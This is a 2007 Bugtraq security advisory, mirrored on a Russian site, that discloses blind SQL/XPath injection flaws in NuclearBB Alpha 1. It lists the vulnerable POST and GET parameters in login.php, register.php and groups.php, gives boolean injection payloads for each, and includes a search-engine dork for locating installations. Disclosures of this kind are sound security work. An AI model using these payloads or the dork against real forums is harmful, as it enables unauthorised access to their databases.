OpenNET security: NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection

NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection


<< Previous	INDEX	Search	src / Print	Next >>

Date: 18 Apr 2007 19:16:26 -0000
From: john@martinelli.com
To: bugtraq@securityfocus.com
Subject: NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection
 Vulnerabilities
X-Virus-Scanned: antivirus-gw at tyumen.ru

NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities

Vulnerable: NuclearBB Alpha 1
Google d0rk: "This forum is powered by NuclearBB"


=============
String Inputs
=============

----------------------------
login.php - $_POST['submit']

username=xyz
password=passxyz
submit=Login"+and+"1"="0

--------------------------------
register.php - $_POST['website']

username=xyz@xyz.com
email=xyz@xyz.com
pass1=passwordxyz
pass2=passwordxyz
website=xyz@xyz.com"+and+"1"="0
location=xyz@xyz.com
msn=xyz@xyz.com
yahoo=xyz@xyz.com
aol=xyz@xyz.com
icq=xyz@xyz.com
signature=xyz@xyz.com
coppa_state=over
register_submit=Register

----------------------------
register.php - $_POST['aol']

username=xyz@xyz.com
email=xyz@xyz.com
pass1=xyz@xyz.com
pass2=xyz@xyz.com
website=xyz@xyz.com
location=xyz@xyz.com
msn=xyz@xyz.com
yahoo=xyz@xyz.com
aol=xyz@xyz.com"+and+"1"="0
icq=xyz@xyz.com
signature=xyz@xyz.com
coppa_state=over
register_submit=Register

----------------------------------
register.php - $_POST['signature']

username=xyz@xyz.com
email=xyz@xyz.com
pass1=xyz@xyz.com
pass2=xyz@xyz.com
website=xyz@xyz.com
location=xyz@xyz.com
msn=xyz@xyz.com
yahoo=xyz@xyz.com
aol=xyz@xyz.com
icq=xyz@xyz.com
signature=xyz@xyz.com"+and+"1"="0
coppa_state=over
register_submit=Register

==============
Numeric Inputs
==============

-----------------------
groups.php - $_GET['g']

http://www.example.com/groups.php?g=1+and+1=0

------------------------------
register.php - $_POST['email']

username=xyz@xyz.com
email=xyz@xyz.com+and+1=0
pass1=xyz@xyz.com
pass2=xyz@xyz.com
website=xyz@xyz.com
location=xyz@xyz.com
msn=xyz@xyz.com
yahoo=xyz@xyz.com
aol=xyz@xyz.com
icq=xyz@xyz.com
signature=xyz@xyz.com
coppa_state=over&register_submit=Register


John Martinelli
john@martinelli.com
http://john-martinelli.com

April 18th, 2007


<< Previous	INDEX	Search	src / Print	Next >>

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру